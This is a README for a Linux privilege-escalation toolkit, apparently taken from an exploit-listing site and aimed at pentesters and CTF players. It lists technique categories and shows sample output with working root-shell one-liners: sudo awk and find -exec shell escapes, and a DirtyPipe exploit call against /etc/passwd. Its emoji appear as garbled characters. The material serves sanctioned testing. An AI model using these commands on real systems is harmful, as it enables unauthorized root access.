Share
## https://sploitus.com/exploit?id=D0A0DF53-AA3B-5A5C-B03B-5D3F30790643
# ๐ง Linux Privilege Escalation Toolkit
> Automated enumeration + exploit suggestion + 50+ privesc techniques. For pentesters, CTF players, and red teams.
---
## ๐ก What is Linux-Privesc?
A comprehensive toolkit for finding and exploiting Linux privilege escalation vectors:
- ๐ **Auto-enumeration** โ 200+ checks in one command
- ๐ฏ **Smart matching** โ suggests exploits based on kernel, SUID, capabilities
- ๐ **Living documentation** โ each technique has explanation + fix
- ๐ ๏ธ **Exploit compiler** โ auto-compiles kernel exploits for your target
---
## ๐ Quick Start
```bash
git clone https://github.com/javokhir-sec/linux-privesc.git
cd linux-privesc
chmod +x privesc.sh
# Full enumeration
./privesc.sh full
# Quick check (top 20 most common)
./privesc.sh quick
# Specific category
./privesc.sh suid
./privesc.sh capabilities
./privesc.sh cron
./privesc.sh sudo
```
---
## ๐ Covers
| Category | Checks | Examples |
|----------|--------|----------|
| ๐ SUID/SGID | 30+ | find, vim, bash, python, pkexec |
| โก Sudo | 20+ | LD_PRELOAD, env_keep, NOPASSWD |
| ๐ Cron Jobs | 15+ | Writable scripts, PATH hijack |
| ๐ง Capabilities | 10+ | cap_sys_ptrace, cap_dac_read_search |
| ๐ File Permissions | 25+ | Shadow readable, SSH keys, configs |
| ๐ง Kernel Exploits | 40+ | DirtyCow, DirtyPipe, PwnKit, GameOver(lay) |
| ๐ NFS/Shares | 5+ | no_root_squash, mounted shares |
| ๐ณ Docker/LXC | 10+ | Privileged containers, socket exposure |
| ๐ Writable Files | 20+ | /etc/passwd, /etc/sudoers, services |
| ๐ Credential Hunting | 15+ | History files, config files, logs |
---
## โก Example Output
```
๐ง Linux-Privesc v1.0 โ Starting enumeration...
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
[+] OS: Ubuntu 20.04.6 LTS | Kernel: 5.4.0-150-generic
[+] User: www-data (uid=33)
๐ SUID Binaries:
โ ๏ธ /usr/bin/find โ GTFOBins: privesc via -exec
โ ๏ธ /usr/bin/python3.8 โ GTFOBins: capability abuse
โก Sudo Rights:
โ ๏ธ (ALL) NOPASSWD: /usr/bin/awk โ GTFOBins: shell escape
๐ง Kernel Exploits:
๐ CVE-2022-0847 (DirtyPipe) โ Kernel 5.4.0 MATCH!
๐ CVE-2021-4034 (PwnKit) โ pkexec found!
๐ฏ Quick Wins (3 found):
1. sudo awk 'BEGIN {system("/bin/sh")}'
2. find . -exec /bin/sh -p \; -quit
3. ./DirtyPipe-exploit /etc/passwd 1 ootz
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ
Enumeration complete. 3 quick wins found!
```
---
## ๐ License
MIT ยฉ [Javokhir Tursunboyev](https://github.com/javokhir-sec)